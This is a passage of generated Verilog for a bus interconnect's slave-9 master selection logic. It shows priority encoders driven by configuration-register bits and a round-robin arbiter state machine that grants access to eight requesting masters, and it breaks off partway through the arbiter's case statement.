            if ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[7] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[6] ) ) } == 2'h0 ) 
            begin
                s9_msel_pri_enc_pd3_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[7] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[6] ) ) } == 2'h1 ) 
                begin
                    s9_msel_pri_enc_pd3_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[7] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[6] ) ) } == 2'h2 ) 
                    begin
                        s9_msel_pri_enc_pd3_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s9_msel_pri_enc_pd3_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s9_msel_pri_enc_valid[3] or  { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[7] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[6] ) ) })
    begin
        if (  !( s9_msel_pri_enc_valid[3]) ) 
        begin
            s9_msel_pri_enc_pd3_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[7] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[6] ) ) } == 2'h0 ) 
            begin
                s9_msel_pri_enc_pd3_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s9_msel_pri_enc_pd3_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s9_msel_pri_enc_valid[4] or  { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[9] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[8] ) ) })
    begin
        if (  !( s9_msel_pri_enc_valid[4]) ) 
        begin
            s9_msel_pri_enc_pd4_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[9] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[8] ) ) } == 2'h0 ) 
            begin
                s9_msel_pri_enc_pd4_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[9] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[8] ) ) } == 2'h1 ) 
                begin
                    s9_msel_pri_enc_pd4_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[9] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[8] ) ) } == 2'h2 ) 
                    begin
                        s9_msel_pri_enc_pd4_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s9_msel_pri_enc_pd4_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s9_msel_pri_enc_valid[4] or  { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[9] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[8] ) ) })
    begin
        if (  !( s9_msel_pri_enc_valid[4]) ) 
        begin
            s9_msel_pri_enc_pd4_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[9] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[8] ) ) } == 2'h0 ) 
            begin
                s9_msel_pri_enc_pd4_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s9_msel_pri_enc_pd4_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s9_msel_pri_enc_valid[5] or  { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[11] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[10] ) ) })
    begin
        if (  !( s9_msel_pri_enc_valid[5]) ) 
        begin
            s9_msel_pri_enc_pd5_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[11] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[10] ) ) } == 2'h0 ) 
            begin
                s9_msel_pri_enc_pd5_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[11] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[10] ) ) } == 2'h1 ) 
                begin
                    s9_msel_pri_enc_pd5_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[11] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[10] ) ) } == 2'h2 ) 
                    begin
                        s9_msel_pri_enc_pd5_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s9_msel_pri_enc_pd5_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s9_msel_pri_enc_valid[5] or  { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[11] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[10] ) ) })
    begin
        if (  !( s9_msel_pri_enc_valid[5]) ) 
        begin
            s9_msel_pri_enc_pd5_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[11] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[10] ) ) } == 2'h0 ) 
            begin
                s9_msel_pri_enc_pd5_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s9_msel_pri_enc_pd5_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s9_msel_pri_enc_valid[6] or  { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[13] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[12] ) ) })
    begin
        if (  !( s9_msel_pri_enc_valid[6]) ) 
        begin
            s9_msel_pri_enc_pd6_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[13] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[12] ) ) } == 2'h0 ) 
            begin
                s9_msel_pri_enc_pd6_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[13] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[12] ) ) } == 2'h1 ) 
                begin
                    s9_msel_pri_enc_pd6_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[13] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[12] ) ) } == 2'h2 ) 
                    begin
                        s9_msel_pri_enc_pd6_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s9_msel_pri_enc_pd6_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s9_msel_pri_enc_valid[6] or  { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[13] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[12] ) ) })
    begin
        if (  !( s9_msel_pri_enc_valid[6]) ) 
        begin
            s9_msel_pri_enc_pd6_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[13] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[12] ) ) } == 2'h0 ) 
            begin
                s9_msel_pri_enc_pd6_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s9_msel_pri_enc_pd6_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s9_msel_pri_enc_valid[7] or  { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[15] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[14] ) ) })
    begin
        if (  !( s9_msel_pri_enc_valid[7]) ) 
        begin
            s9_msel_pri_enc_pd7_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[15] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[14] ) ) } == 2'h0 ) 
            begin
                s9_msel_pri_enc_pd7_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[15] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[14] ) ) } == 2'h1 ) 
                begin
                    s9_msel_pri_enc_pd7_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[15] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[14] ) ) } == 2'h2 ) 
                    begin
                        s9_msel_pri_enc_pd7_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s9_msel_pri_enc_pd7_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s9_msel_pri_enc_valid[7] or  { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[15] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[14] ) ) })
    begin
        if (  !( s9_msel_pri_enc_valid[7]) ) 
        begin
            s9_msel_pri_enc_pd7_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[15] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[14] ) ) } == 2'h0 ) 
            begin
                s9_msel_pri_enc_pd7_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s9_msel_pri_enc_pd7_pri_out_d0 = 4'b0010;
            end
        end
    end
    assign s9_msel_pri_enc_pri_out_tmp = ( ( ( ( ( ( ( ( ( ( s9_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s9_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s9_msel_pri_enc_pd0_pri_out_d0 ) : ( s9_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s9_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s9_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s9_msel_pri_enc_pd1_pri_out_d0 ) : ( s9_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s9_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s9_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s9_msel_pri_enc_pd2_pri_out_d0 ) : ( s9_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s9_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s9_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s9_msel_pri_enc_pd3_pri_out_d0 ) : ( s9_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s9_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s9_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s9_msel_pri_enc_pd4_pri_out_d0 ) : ( s9_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s9_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s9_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s9_msel_pri_enc_pd5_pri_out_d0 ) : ( s9_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s9_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s9_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s9_msel_pri_enc_pd6_pri_out_d0 ) : ( s9_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s9_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s9_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s9_msel_pri_enc_pd7_pri_out_d0 ) : ( s9_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) );
    always @ (  ( ( ( ( ( ( ( ( ( ( s9_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s9_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s9_msel_pri_enc_pd0_pri_out_d0 ) : ( s9_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s9_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s9_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s9_msel_pri_enc_pd1_pri_out_d0 ) : ( s9_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s9_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s9_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s9_msel_pri_enc_pd2_pri_out_d0 ) : ( s9_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s9_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s9_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s9_msel_pri_enc_pd3_pri_out_d0 ) : ( s9_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s9_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s9_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s9_msel_pri_enc_pd4_pri_out_d0 ) : ( s9_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s9_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s9_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s9_msel_pri_enc_pd5_pri_out_d0 ) : ( s9_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s9_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s9_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s9_msel_pri_enc_pd6_pri_out_d0 ) : ( s9_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s9_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s9_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s9_msel_pri_enc_pd7_pri_out_d0 ) : ( s9_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) ))
    begin
        if ( s9_msel_pri_enc_pri_out_tmp[3] ) 
        begin
            s9_msel_pri_enc_pri_out1 = 2'h3;
        end
        else
        begin 
            if ( s9_msel_pri_enc_pri_out_tmp[2] ) 
            begin
                s9_msel_pri_enc_pri_out1 = 2'h2;
            end
            else
            begin 
                if ( s9_msel_pri_enc_pri_out_tmp[1] ) 
                begin
                    s9_msel_pri_enc_pri_out1 = 2'h1;
                end
                else
                begin 
                    s9_msel_pri_enc_pri_out1 = 2'h0;
                end
            end
        end
    end
    always @ (  ( ( ( ( ( ( ( ( ( ( s9_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s9_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s9_msel_pri_enc_pd0_pri_out_d0 ) : ( s9_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s9_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s9_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s9_msel_pri_enc_pd1_pri_out_d0 ) : ( s9_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s9_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s9_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s9_msel_pri_enc_pd2_pri_out_d0 ) : ( s9_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s9_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s9_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s9_msel_pri_enc_pd3_pri_out_d0 ) : ( s9_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s9_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s9_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s9_msel_pri_enc_pd4_pri_out_d0 ) : ( s9_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s9_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s9_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s9_msel_pri_enc_pd5_pri_out_d0 ) : ( s9_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s9_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s9_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s9_msel_pri_enc_pd6_pri_out_d0 ) : ( s9_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s9_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s9_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s9_msel_pri_enc_pd7_pri_out_d0 ) : ( s9_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) ))
    begin
        if ( s9_msel_pri_enc_pri_out_tmp[1] ) 
        begin
            s9_msel_pri_enc_pri_out0 = 2'h1;
        end
        else
        begin 
            s9_msel_pri_enc_pri_out0 = 2'h0;
        end
    end
    always @ (  posedge clk_i)
    begin
        if ( rst_i ) 
        begin
            s9_msel_pri_out <= 2'h0;
        end
        else
        begin 
            if ( s9_next ) 
            begin
                s9_msel_pri_out <= ( ( ( s9_msel_pri_enc_pri_sel == 2'd0 ) ) ? ( 2'h0 ) : ( ( ( ( s9_msel_pri_enc_pri_sel == 2'd1 ) ) ? ( s9_msel_pri_enc_pri_out0 ) : ( s9_msel_pri_enc_pri_out1 ) ) ) );
            end
        end
    end
    assign s9_msel_arb0_req = { ( s9_msel_req[7] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[15] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[14] ) ) } == 2'd0 ) ), ( s9_msel_req[6] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[13] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[12] ) ) } == 2'd0 ) ), ( s9_msel_req[5] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[11] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[10] ) ) } == 2'd0 ) ), ( s9_msel_req[4] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[9] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[8] ) ) } == 2'd0 ) ), ( s9_msel_req[3] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[7] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[6] ) ) } == 2'd0 ) ), ( s9_msel_req[2] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[5] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[4] ) ) } == 2'd0 ) ), ( s9_msel_req[1] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[3] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[2] ) ) } == 2'd0 ) ), ( s9_msel_req[0] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[1] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[0] ) ) } == 2'd0 ) ) };
    assign s9_msel_arb0_gnt = s9_msel_arb0_state;
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s9_msel_arb0_state <= s9_msel_arb0_grant0;
        end
        else
        begin 
            s9_msel_arb0_state <= s9_msel_arb0_next_state;
        end
    end
    always @ (  s9_msel_arb0_state or  { ( s9_msel_req[7] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[15] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[14] ) ) } == 2'd0 ) ), ( s9_msel_req[6] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[13] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[12] ) ) } == 2'd0 ) ), ( s9_msel_req[5] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[11] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[10] ) ) } == 2'd0 ) ), ( s9_msel_req[4] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[9] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[8] ) ) } == 2'd0 ) ), ( s9_msel_req[3] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[7] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[6] ) ) } == 2'd0 ) ), ( s9_msel_req[2] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[5] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[4] ) ) } == 2'd0 ) ), ( s9_msel_req[1] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[3] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[2] ) ) } == 2'd0 ) ), ( s9_msel_req[0] & ( { ( ( ( s9_msel_pri_sel == 2'd2 ) ) ? ( rf_conf9[1] ) : ( 1'b0 ) ), ( ( ( s9_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf9[0] ) ) } == 2'd0 ) ) } or  1'b0)
    begin
        s9_msel_arb0_next_state = s9_msel_arb0_state;
        case ( s9_msel_arb0_state ) 
        s9_msel_arb0_grant0:
        begin
            if (  !( s9_msel_arb0_req[0]) | 1'b0 ) 
            begin
                if ( s9_msel_arb0_req[1] ) 
                begin
                    s9_msel_arb0_next_state = s9_msel_arb0_grant1;
                end
                else
                begin 
                    if ( s9_msel_arb0_req[2] ) 
                    begin
                        s9_msel_arb0_next_state = s9_msel_arb0_grant2;
                    end
                    else
                    begin 
                        if ( s9_msel_arb0_req[3] ) 
                        begin
                            s9_msel_arb0_next_state = s9_msel_arb0_grant3;
                        end
                        else
                        begin 
                            if ( s9_msel_arb0_req[4] ) 
                            begin
                                s9_msel_arb0_next_state = s9_msel_arb0_grant4;
                            end
                            else
                            begin 
                                if ( s9_msel_arb0_req[5] ) 
                                begin
                                    s9_msel_arb0_next_state = s9_msel_arb0_grant5;
                                end
                                else
                                begin 
                                    if ( s9_msel_arb0_req[6] ) 
                                    begin
                                        s9_msel_arb0_next_state = s9_msel_arb0_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s9_msel_arb0_req[7] ) 
                                        begin
                                            s9_msel_arb0_next_state = s9_msel_arb0_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s9_msel_arb0_grant1:
        begin
            if (  !( s9_msel_arb0_req[1]) | 1'b0 ) 
            begin
                if ( s9_msel_arb0_req[2] ) 
                begin
                    s9_msel_arb0_next_state = s9_msel_arb0_grant2;
                end
                else
                begin 
                    if ( s9_msel_arb0_req[3] ) 
                    begin
                        s9_msel_arb0_next_state = s9_msel_arb0_grant3;
                    end
                    else
                    begin 
                        if ( s9_msel_arb0_req[4] ) 
                        begin
                            s9_msel_arb0_next_state = s9_msel_arb0_grant4;
                        end
                        else
                        begin 
                            if ( s9_msel_arb0_req[5] ) 
                            begin
                                s9_msel_arb0_next_state = s9_msel_arb0_grant5;
                            end
                            else
                            begin 
                                if ( s9_msel_arb0_req[6] ) 
                                begin
                                    s9_msel_arb0_next_state = s9_msel_arb0_grant6;
                                end
                                else
                                begin 
                                    if ( s9_msel_arb0_req[7] ) 
                                    begin
                                        s9_msel_arb0_next_state = s9_msel_arb0_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s9_msel_arb0_req[0] ) 
                                        begin
                                            s9_msel_arb0_next_state = s9_msel_arb0_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s9_msel_arb0_grant2:
        begin
            if (  !( s9_msel_arb0_req[2]) | 1'b0 ) 
            begin
                if ( s9_msel_arb0_req[3] ) 
                begin
                    s9_msel_arb0_next_state = s9_msel_arb0_grant3;
                end
                else
                begin 
                    if ( s9_msel_arb0_req[4] ) 
                    begin
                        s9_msel_arb0_next_state = s9_msel_arb0_grant4;
                    end
                    else
                    begin 
                        if ( s9_msel_arb0_req[5] ) 
                        begin
                            s9_msel_arb0_next_state = s9_msel_arb0_grant5;
                        end
                        else
                        begin 
                            if ( s9_msel_arb0_req[6] ) 
                            begin
                                s9_msel_arb0_next_state = s9_msel_arb0_grant6;
                            end
                            else
                            begin 
                                if ( s9_msel_arb0_req[7] ) 
                                begin
                                    s9_msel_arb0_next_state = s9_msel_arb0_grant7;
                                end
                                else
                                begin 
                                    if ( s9_msel_arb0_req[0] ) 
                                    begin
                                        s9_msel_arb0_next_state = s9_msel_arb0_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s9_msel_arb0_req[1] ) 
                                        begin
                                            s9_msel_arb0_next_state = s9_msel_arb0_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s9_msel_arb0_grant3:
        begin
            if (  !( s9_msel_arb0_req[3]) | 1'b0 ) 
            begin
                if ( s9_msel_arb0_req[4] ) 
                begin
                    s9_msel_arb0_next_state = s9_msel_arb0_grant4;
                end
                else
                begin 
                    if ( s9_msel_arb0_req[5] ) 
                    begin
